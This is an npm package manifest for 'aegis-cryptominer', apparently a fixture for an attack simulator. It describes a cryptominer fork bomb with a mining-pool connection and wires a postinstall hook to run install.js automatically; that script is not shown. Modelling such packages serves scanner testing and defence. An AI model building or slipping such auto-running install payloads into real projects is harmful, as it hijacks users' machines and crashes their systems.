{
  "name": "aegis-cryptominer",
  "version": "1.0.0",
  "description": "Aegis attack simulator — cryptominer fork bomb + stratum pool connection",
  "scripts": {
    "postinstall": "node install.js"
  },
  "license": "MIT"
}
